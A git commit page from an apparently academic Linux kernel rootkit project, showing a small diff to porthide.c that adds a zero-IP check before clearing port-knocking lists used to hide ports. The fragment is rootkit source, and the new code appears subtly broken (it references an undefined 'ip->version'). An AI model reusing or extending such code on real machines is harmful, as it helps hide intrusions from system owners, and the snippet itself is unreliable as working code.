adds noip check - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 259b7b02bd8f741770a23f73a228b2fb20429576
parent 10f7fd5244aeaf411d68797abe6c302af555e471
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 10 Jan 2021 21:26:45 +0100

adds noip check

Diffstat:
M src/porthide.c  | 10 +++++++---

1 file changed, 7 insertions(+), 3 deletions(-)
diff --git a/src/porthide.c b/src/porthide.c
@@ -89,13 +89,17 @@ clear_hidden_lports(void)
     knock_list_t_ptr i;
 
     i = ips_stage1_tail;
-    while ((i = remove_knock_from_list(i, &i, i->ip, i->version)));
+    ip_t no_ip = { 0 };
+    if (memcmp(i->ip, no_ip, (ip->version == v4 ? 4 : 16)))
+        while ((i = remove_knock_from_list(i, &i, i->ip, i->version)));
 
     i = ips_stage2_tail;
-    while ((i = remove_knock_from_list(i, &i, i->ip, i->version)));
+    if (memcmp(i->ip, no_ip, (ip->version == v4 ? 4 : 16)))
+        while ((i = remove_knock_from_list(i, &i, i->ip, i->version)));
 
     i = ips_stage3_tail;
-    while ((i = remove_knock_from_list(i, &i, i->ip, i->version)));
+    if (memcmp(i->ip, no_ip, (ip->version == v4 ? 4 : 16)))
+        while ((i = remove_knock_from_list(i, &i, i->ip, i->version)));
 
     lport_list_t_ptr j;

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs